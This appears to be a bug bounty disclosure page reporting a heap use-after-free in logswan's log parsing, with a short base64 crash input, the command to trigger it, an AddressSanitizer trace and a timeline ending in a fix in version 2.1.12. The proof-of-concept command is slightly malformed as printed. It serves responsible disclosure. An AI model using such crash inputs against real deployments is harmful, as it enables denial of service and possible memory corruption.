Use After Free in fcambus/logswan


Reported on

Nov 29th 2021


Good morning, I hope you're doing well today. Whilst testing logswan built with Clang12 + ASan on Ubuntu 20.04.3 LTS from commit bcfd41, we discovered a heap-use-after-free situation during a strcmp operation on line 259 of logswan/src/logswan.c.

Proof of Concept


MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAKMC4wLjAuMCAwIDBbMF0wIjA=" | base64 > /tmp/test.log


./logwan /tmp/test.log

Stack Trace:

==8152==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000000051 at pc 0x00000026f5d2 bp 0x7ffcf50d1170 sp 0x7ffcf50d0918
READ of size 1 at 0x60c000000051 thread T0
    #0 0x26f5d1 in strcmp (/root/logswan/build/logswan+0x26f5d1)
    #1 0x30d473 in main /root/logswan/src/logswan.c:259:11
    #2 0x7fa42491f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #3 0x25c7ad in _start (/root/logswan/build/logswan+0x25c7ad)

0x60c000000051 is located 17 bytes inside of 120-byte region [0x60c000000040,0x60c0000000b8)
freed by thread T0 here:
    #0 0x2d7d29 in realloc (/root/logswan/build/logswan+0x2d7d29)
    #1 0x7fa42497e71d in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:102:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/

previously allocated by thread T0 here:
    #0 0x2d7a0d in malloc (/root/logswan/build/logswan+0x2d7a0d)
    #1 0x7fa42497e6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/

SUMMARY: AddressSanitizer: heap-use-after-free (/root/logswan/build/logswan+0x26f5d1) in strcmp


This vulnerability is capable of crashing the software, heap corruption, and other unspecified issues resulting from using memory after it has been freed by the software.

We are processing your report and will contact the fcambus/logswan team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the fcambus/logswan team and are waiting to hear back a year ago
Jamie Slome validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome marked this as fixed in 2.1.12 with commit c3fc63 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation